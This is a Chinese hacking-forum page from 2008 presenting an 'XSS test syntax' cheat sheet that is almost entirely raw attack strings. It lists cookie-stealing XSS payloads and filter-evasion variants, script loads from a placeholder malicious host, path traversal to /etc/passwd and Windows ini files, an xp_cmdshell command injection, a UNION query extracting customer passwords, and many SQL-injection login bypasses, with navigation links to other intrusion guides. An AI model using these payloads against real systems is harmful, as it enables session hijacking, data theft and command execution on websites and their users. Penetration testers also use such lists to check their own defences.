·	没有路由密码权限时的鸽	08-23	·	服务器访问帐号设置要安	10-17
·	ZhengTu盗号马bdscheca0	10-17	·	系统安全从定制IP策略开	10-17
·	从黑客常用的攻击手段分	10-17	·	几秒钟自定制XP启动画面	10-17
·	文件批量重命名 Win XP自	10-17	·	Trojan-Dropper.Win32.A	10-17
·	突破FSO限制夺取系统权限	10-17	·	笔记本电脑用户应如何选	10-17
·	XSS测试语法大全	10-17	·	防火墙三大体系构架你该	10-17
·	后台拿shell全集	10-17	·	脱壳的入门教程	10-17
·	只需两招轻松识破QQ安全	10-17	·	bat 延时执行命令的三种	10-17
·	安全顾问教你如何安全使	10-17	·	千脑提供500M免费WebOS网	10-17
·	Graffiti提供20M免费静态	10-17	·	FreeUnlimitedWeb提供无	10-16
·	假如对方是个BT 之 \ 被	10-15	·	mysql注入检测工具	10-15
·	入侵中用到的三大门派的	10-15	·	Power Mixer 系统音量随	10-15
·	妙用Vista的任务计划解除	10-15	·	善用外力，让Vista系统功	10-15
·	走啦网提供免费二级域名	10-15	·	光纤互联提供200M免费静	10-15

[推荐]XSS测试语法大全

荐 ★★★★

XSS测试语法大全

文章整理发布：黑客风云文章来源：www.05112.com 更新时间：2008-10-17 16:58:16

以下是引用片段：
<script>alert(document.cookie)</script>
　　=’><script>alert(document.cookie)</script>
　　<script>alert(document.cookie)</script>
　　<script>alert(vulnerable)</script>
　　%3Cscript%3Ealert(’XSS’)%3C/script%3E
　　<script>alert(’XSS’)</script>
　　<img src="javascript:alert(’XSS’)">
　　%0a%0a<script>alert(\"Vulnerable\")</script>.jsp
　　%22%3cscript%3ealert(%22xss%22)%3c/script%3e
　　%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
　　%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini
　　%3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
　　%3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
　　%3cscript%3ealert(%22xss%22)%3c/script%3e/index.html
　　<script>alert(’Vulnerable’);</script>
　　<script>alert(’Vulnerable’)</script>
　　?sql_debug=1
　　a%5c.aspx
　　a.jsp/<script>alert(’Vulnerable’)</script>
　　a?<script>alert(’Vulnerable’)</script>
　　"><script>alert(’Vulnerable’)</script>
　　’;exec%20master..xp_cmdshell%20’dir%20 c:%20>%20c:\inetpub\wwwroot\?.txt’--&&
　　%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
　　%3Cscript%3Ealert(document. domain);%3C/script%3E&
　　%3Cscript%3Ealert(document.domain);%3C/script%3E&SESSION_ID={SESSION_ID}&SESSION_ID= 1%20union%20all%20select%20pass,0,0,0,0%20from%20customers%20where%20fname=
　　../../../../../../../../etc/passwd
　　..\..\..\..\..\..\..\..\windows\system.ini
　　\..\..\..\..\..\..\..\..\windows\system.ini
　　’’;!--"<XSS>=&{()}
　　<IMG SRC="javascript:alert(’XSS’);">
　　<IMG SRC=javascript:alert(’XSS’)>
　　<IMG SRC=JaVaScRiPt:alert(’XSS’)>
　　<IMG SRC=JaVaScRiPt:alert("XSS")>
　　<IMG SRC=javascript:alert(’XSS’)>
　　<IMG SRC=javascript:alert(’XSS’)>
　　<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
　　<IMG SRC="javascript:alert(’XSS’);">
　　"<IMG SRC=java\0script:alert(\"XSS\")>";’ > out
　　<IMG SRC=" javascript:alert(’XSS’);">
　　<SCRIPT>a=/XSS/alert(a.source)</SCRIPT>
　　<BODY BACKGROUND="javascript:alert(’XSS’)">
　　<BODY ONLOAD=alert(’XSS’)>
　　<IMG DYNSRC="javascript:alert(’XSS’)">
　　<IMG LOWSRC="javascript:alert(’XSS’)">
　　<BGSOUND SRC="javascript:alert(’XSS’);">
　　<br size="&{alert(’XSS’)}">
　　<LAYER SRC="http://惡意網址/a.js"></layer>
　　<LINK REL="stylesheet" HREF="javascript:alert(’XSS’);">
　　<IMG SRC=’vbscript:msgbox("XSS")’>
　　<IMG SRC="mocha:[code]">
　　<IMG SRC="livescript:[code]">
　　<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(’XSS’);">
　　<IFRAME SRC=javascript:alert(’XSS’)></IFRAME>
　　<FRAMESET><FRAME SRC=javascript:alert(’XSS’)></FRAME></FRAMESET>
　　<TABLE BACKGROUND="javascript:alert(’XSS’)">
　　<DIV STYLE="background-image: url(javascript:alert(’XSS’))">
　　<DIV STYLE="behaviour: url(’http://惡意網址/exploit.html’);">
　　<DIV STYLE="width: expression(alert(’XSS’));">
　　<STYLE>@im\port’\ja\vasc\ript:alert("XSS")’;</STYLE>
　　<IMG STYLE=’xss:expre\ssion(alert("XSS"))’>
　　<STYLE TYPE="text/javascript">alert(’XSS’);</STYLE>
　　<STYLE TYPE="text/css">.XSS{background-image:url("javascript:alert(’XSS’)");}</STYLE><A CLASS=XSS></A>
　　<STYLE type="text/css">BODY{background:url("javascript:alert(’XSS’)")}</STYLE>
　　<BASE HREF="javascript:alert(’XSS’);//">
　　getURL("javascript:alert(’XSS’)")
　　a="get";b="URL";c="javascript:";d="alert(’XSS’);";eval(a+b+c+d);
　　<XML SRC="javascript:alert(’XSS’);">
　　"> <BODY ONLOAD="a();"><SCRIPT>function a(){alert(’XSS’);}</SCRIPT><"
　　<SCRIPT SRC="http://惡意網址/xss.jpg"></SCRIPT>
　　<IMG SRC="javascript:alert(’XSS’)"
　　
　　<IMG SRC="http://惡意網址/somecommand.php?somevariables=maliciouscode">
　　<SCRIPT a=">" SRC="http://惡意網址/a.js"></SCRIPT>
　　<SCRIPT =">" SRC="http://惡意網址/a.js"></SCRIPT>
　　<SCRIPT a=">" ’’ SRC="http://惡意網址/a.js"></SCRIPT>
　　<SCRIPT "a=’>’" SRC="http://惡意網址/a.js"></SCRIPT>
　　<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://惡意網址/a.js"></SCRIPT>
　　<A HREF=http://惡意網址/>link</A>
　　admin’--
　　’ or 0=0 --
　　" or 0=0 --
　　or 0=0 --
　　’ or 0=0 #
　　" or 0=0 #
　　or 0=0 #
　　’ or ’x’=’x
　　" or "x"="x
　　’) or (’x’=’x
　　’ or 1=1--
　　" or 1=1--
　　or 1=1--
　　’ or a=a--
　　" or "a"="a
　　’) or (’a’=’a
　　") or ("a"="a
　　hi" or "a"="a
　　hi" or 1=1 --
　　hi’ or 1=1 --
　　hi’ or ’a’=’a
　　hi’) or (’a’=’a
　　hi") or ("a"="aXSS測試語法><script>alert(document.cookie)</script>

文章录入：heilong916 责任编辑：xinlian

上一篇文章：脱壳的入门教程

下一篇文章：没有了

【字体：小大】

中介交易区

入侵网站必备经典语句	01-17
说说session	10-23
新or注入教程	09-10
Mssql2005注入命令总结	07-30
阿D常用注入命令汇总	07-30
Penetration Testing 渗透测试	07-04
Exploit Sites 和0day公布的站点	06-18
3389得到肉鸡后的命令	06-18
Cmd模式下的入侵技术大全	05-30
阿D常用注入命令整理	05-17
opendatasource学习记录	05-14
SQL Injection规避入侵检测技术总	05-06